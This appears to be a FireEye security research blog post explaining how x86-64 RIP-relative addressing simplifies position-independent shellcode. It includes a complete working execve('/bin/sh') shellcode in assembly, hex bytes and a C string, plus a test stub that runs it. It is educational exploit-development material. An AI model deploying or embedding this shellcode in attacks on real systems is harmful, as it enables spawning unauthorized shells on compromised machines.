Instruction Pointer Relative Addressing (for position independent code)

So, here's an interesting trick I've been using, that I've never seen anyone mention before. One of the new features that AMD added to the x86 instruction set when they did the AMD64/x86-64, was that in "long mode" (64-bit mode), the encoding for the old 32-bit immediate offset addressing mode, is now a 32-bit offset from the current RIP, not from 0x00000000 like before. In English, this means that you don't have to know the absolute address of something you want to reference, you only need to know how far away it is from the currently executing instruction [technically the next instruction].

So, let's say you're writing a fairly generic execve() shellcode. I'm going to assume that everyone here has read Aleph One's paper on this, so I'm not going to repeat that here. (Gripe: What is it with all these shellcode tutorials, that are just slightly rewritten copies of "Smashing the Stack…"?)

This is what we want to do:


execve() example in C

#include <stdio.h>

int main() {

char *name[2];

asm("nop");

name[0] = "/bin/sh";

name[1] = NULL;

execve(name[0], name, NULL);

asm("nop");

return 0;

}


I just put the NOP's in there to make things easier to spot below.

gdb spewage

gcc -static -g -o example example.c

gdb example

[spew]

*(gdb) disassemble main

Dump of assembler code for function main:

0x0000000000400284 <main+0>: push %rbp

0x0000000000400285 <main+1>: mov %rsp,%rbp

0x0000000000400288 <main+4>: sub $0x10,%rsp

0x000000000040028c <main+8>: nop

0x000000000040028d <main+9>: movq $0x451ce4,0xfffffffffffffff0(%rbp)

0x0000000000400295 <main+17>: movq $0x0,0xfffffffffffffff8(%rbp)

0x000000000040029d <main+25>: lea 0xfffffffffffffff0(%rbp),%rsi

0x00000000004002a1 <main+29>: mov 0xfffffffffffffff0(%rbp),%rdi

0x00000000004002a5 <main+33>: mov $0x0,%edx

0x00000000004002aa <main+38>: mov $0x0,%eax

0x00000000004002af <main+43>: callq 0x406740 <execve>

0x00000000004002b4 <main+48>: nop

0x00000000004002b5 <main+49>: mov $0x0,%eax

0x00000000004002ba <main+54>: leaveq

0x00000000004002bb <main+55>: retq

End of assembler dump.

*(gdb) disassemble execve

Dump of assembler code for function execve:

0x0000000000406740 <execve+0>: mov $0x0,%eax

0x0000000000406745 <execve+5>: mov %rbx,0xffffffffffffffe8(%rsp)

0x000000000040674a <execve+10>: mov %rbp,0xfffffffffffffff0(%rsp)

0x000000000040674f <execve+15>: mov %r12,0xfffffffffffffff8(%rsp)

0x0000000000406754 <execve+20>: sub $0x18,%rsp

0x0000000000406758 <execve+24>: test %rax,%rax

0x000000000040675b <execve+27>: mov %rdi,%r12

0x000000000040675e <execve+30>: mov %rsi,%rbp

0x0000000000406761 <execve+33>: mov %rdx,%rbx

0x0000000000406764 <execve+36>: je 0x40676b <execve+43>

0x0000000000406766 <execve+38>: callq 0x0

0x000000000040676b <execve+43>: mov %rbx,%rdx

0x000000000040676e <execve+46>: mov %rbp,%rsi

0x0000000000406771 <execve+49>: mov %r12,%rdi

0x0000000000406774 <execve+52>: mov $0x3b,%eax

0x0000000000406779 <execve+57>: syscall

You can ignore the rest of this...

0x000000000040677b <execve+59>: cmp $0xfffffffffffff000,%rax

0x0000000000406781 <execve+65>: mov %rax,%rbx

0x0000000000406784 <execve+68>: ja 0x40679b <execve+91>

0x0000000000406786 <execve+70>: mov %ebx,%eax

0x0000000000406788 <execve+72>: mov 0x8(%rsp),%rbp

0x000000000040678d <execve+77>: mov (%rsp),%rbx

0x0000000000406791 <execve+81>: mov 0x10(%rsp),%r12

0x0000000000406796 <execve+86>: add $0x18,%rsp

0x000000000040679a <execve+90>: retq

0x000000000040679b <execve+91>: callq 0x400950 <__errno_location>

0x00000000004067a0 <execve+96>: mov %ebx,%edx

0x00000000004067a2 <execve+98>: mov $0xffffffffffffffff,%rbx

0x00000000004067a9 <execve+105>: neg %edx

0x00000000004067ab <execve+107>: mov %edx,(%rax)

0x00000000004067ad <execve+109>: jmp 0x406786 <execve+70>

0x00000000004067af <execve+111>: nop

End of assembler dump.

*(gdb) x/s 0x451ce4

0x451ce4 <_IO_stdin_used+4>: "/bin/sh"

For lack of being able to easily draw arrows in flat HTML, I'm just coloring the important parts. As you can see, argument 1, the pointer to "/bin/sh" is in RDI, argument 2, the pointer to the pointer to "/bin/sh", followed by NULL, is in RSI, and argument 3, RDX, is NULL. 0x3B (59.) is the syscall number for execve.

We could have also just looked in /usr/linux/include/asm/unistd.h for the calling convention.

Excerpt from unistd.h

#define __NR_execve                             59

__SYSCALL(__NR_execve, stub_execve)

[...]

#define _syscall3(type,name,type1,arg1,type2,arg2,type3,arg3) \

type name(type1 arg1,type2 arg2,type3 arg3) \

{ \

long __res; \

__asm__ volatile (__syscall \

: "=a" (__res) \

: "0" (__NR_##name),"D" ((long)(arg1)),"S" ((long)(arg2)), \

"d" ((long)(arg3)) : __syscall_clobber); \

__syscall_return(type,__res); \

}

So, all we have to do, is have a "/bin/sh" string somewhere in memory, and a pointer to that somewhere else, followed by a NULL; Where ever our shellcode got written to is as good a place as any, but how do we know where we're executing from? On IA-32, there are only two really easy ways to get your current EIP, by making a CALL foo — which is like doing a PUSH EIP ; JMP foo, or by executing a floating point instruction, and dumping the x87 status registers out into memory with FSTENV — historically, the FPU was a completely separate chip, and would do its own exception handling, and stuff.

In Aleph One's original paper he did this trick:

JMP foo

bar: POP ESI

<rest of shellcode>

foo: CALL bar

.string "/bin/sh"

Which gives you, in ESI, the address of that "/bin/sh" at the end of your shellcode. Most of the Pex decoders in the Metasploit Framework use FSTENV to write all the FPU registers out onto the stack, about 12 bytes below the current ESP in fact, which leaves the third DWORD, the EIP, at the top, which can then just be POP'ed off.

On x86-64, it is much easier to find you current RIP, just do this:

LEA EAX, [RIP]

And EAX will contain the address of the next instruction.

blah blah blah…

So, I was going to write a long narrative here, about how to write shellcode, and remove nulls, and use shorter instruction encodings and stuff. But I was just distracted, and lost my train of thought. So if there's anything here you don't understand, just ask. By doing [RIP-7] rather than just [RIP], you avoid having a 0x00000000 immediate value. Everything else should be self-explanatory. I'm writing the argv array just past the end of the "/bin/sh" string.


Shellcode

%define arg1      RDI

%define arg2 RSI

%define arg3 RDX

%define arg3_lowb DL

%define sys_nr AL

%define nr_execve 0x3B

BITS 64

LEA arg1, [RIP-here] ; runtime address of *this* LEA instruction,

; removes 00000000's (always encode with 32-bit

; immediate)

; todo: could just push string onto stack (as

; immediate value)

here:

ADD arg1, BYTE bin_sh ; offset of "/bin/sh" in code below

XOR arg3, arg3 ; execve(..., ..., NULL);

MOV [arg1+null_byte ], arg3_lowb ; write a '\0' to end of string, just in case

MOV [arg1+null_point], arg3 ; name[1] = NULL;

MOV [arg1+name_array], arg1 ; name[0] = address to "/bin/sh" in

; execve("/bin/sh", ..., ...);

LEA arg2, [arg1+name_array] ; execve(..., name, ...);

MOV sys_nr, nr_execve ; Syscall 59 execve()

SYSCALL ; or INT 0x80

bin_sh:

db "/bin/sh";

null_byte equ $-bin_sh

name_array equ null_byte +1

null_point equ name_array+8


The shellcode binary ends up looking like this:

Shellcode Bytes

488D3DF9FFFFFF          LEA RDI, [RIP-here]

4883C721 ADD RDI, BYTE bin_sh

4831D2 XOR RDX, RDX

885707 MOV [RDI+null_byte ], DL

48895710 MOV [RDI+null_point], RDX

48897F08 MOV [RDI+name_array], RDI

488D7708 LEA RSI, [RDI+name_array]

B03B MOV AL, 0x3B

0F05 SYSCALL

2F62696E2F7368 db "/bin/sh"

To quickly test this out, because Gentoo Linux X86_64 will set memory pages to be either writable [X]OR executable, but not both at once, and non-exec actually works on AMD64, I'm just mmaping a page of anonymous memory, writing the shellcode into there, and then running it. This is a lot faster than writing a real exploit. (Which would involve building my own stackframes to make return-to-lib-c calls, to call mprotect and stuff, blah blah.)

memory map

$ cat /proc/16874/maps


00400000-00471000 r-xp 00000000 fd:05 4853              /home/jwolf/duh

00571000-00573000 rw-p 00071000 fd:05 4853              /home/jwolf/duh

00573000-00596000 rw-p 00573000 00:00 0                 [heap]

2b429e3da000-2b429e3db000 rwxs 00000000 00:07 326570    /dev/zero (deleted)this is the mmaped'd page

7fffff7f6000-7fffff80c000 rw-p 7fffff7f6000 00:00 0     [stack]

ffffffffff600000-ffffffffffe00000 ---p 00000000 00:00 0 [vdso]

Cut and paste the spew from this, into the shellcode[], below:

yasm -l shellcode.log -L nasm shellcode.yasm && hexdump -v -e '1/1 "Qx%02x"' shellcode \

|tr "Q" \\\\ ; echo ; ls -l shellcode


Small code stub in C

#include<sys/mman.h>

// TODO: just mmap the binary file the assembler spit out.

char shellcode[] = "\x48\x8d\x3d\xf9\xff\xff\xff\x48\x83\xc7\x21\x48\x31\xd2\x88\x57\x07\x48\x89\x57\x10\x48\x89\x7f\x08\x48\x8d\x77\x08\xb0\x3b\x0f\x05\x2f\x62\x69\x6e\x2f\x73\x68";

int length = 40;

int main() {

void (*exec_mem)() = mmap (0, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, \

MAP_SHARED|MAP_ANONYMOUS, 0, 0);

memcpy(exec_mem, shellcode, length);

asm("break: nop");

exec_mem();

}


Build with something like:

gcc -g -o stub stub.c

then ./stub

sh-3.00$

or if you were root at the time:

sh-3.00#

ta-da.

Debugging notes

If you need to debug this because you got a segfault, then that's a long long topic that I don't feel like writing about right now. I usually start off with:

gdb stub |tee -a gdb_spew.log

and then…

break break

display/i $rip

r

stepi

and then do "info reg" and "x/8xg" stuff as needed.

Postscript:

Has anyone else noticed that when running in 32-bit compatibility mode on AMD64 Linux, that:

  1. gbd is just plain broken (wrong values in registers, etc.)
  2. The registers, for the second argument for a syscall, change, randomly, between EBX and EBP when you're using INT 0x80 vs SYSCALL. (CD80 vs. 0F05)



Julia Wolf @ FireEye Malware Intelligence Lab

Questions/Comments to research [@] fireeye [.] com